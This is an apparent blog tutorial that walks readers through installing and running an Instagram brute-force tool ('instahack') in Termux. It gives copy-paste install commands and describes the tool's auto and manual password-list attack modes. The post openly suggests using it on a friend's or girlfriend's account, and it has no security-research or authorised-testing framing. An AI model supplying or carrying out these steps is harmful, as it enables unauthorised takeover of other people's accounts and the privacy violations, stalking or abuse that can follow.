Ha©k instagram account with bruteforce attack.
Termux Instagram tools
Hello, Guys today I'm going to share with you Instagram Hacking Termux commands. With this tool You can ha©k your friend or girl friend instagram account. In this tool You must need a password list (WORDLIST) or this tool already have a password list you can also use inbuild password list to ha©k instagram account.
Make sure that you have installed Termux app on your phone. If not installed, download it from PlayStore.
So let's get started ::--
Open your Termux and copy paste the following commands carefully.
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pip install lolcat
$ git clone https://github.com/evildevill/instahack
$ ls
$ cd instahack
$ ls
$ bash setup
$ bash instahack.sh
Must read How to Ha¢k Facebook account with Termux
Now tool was successfully installed. Here you can see the options
1) Auto Attack :- it means bruteforce attack with attached (inbuild) tool password list. Here you can see the screenshot
2) Manual Attack :- If you have a target password list then enter the password list path like ( /sdcard/passwords.txt )
Injoy 👍
I hope that you will understand the following commands. If you facing any error or problems contact Us for help.
Termux Instagram tools, hackme127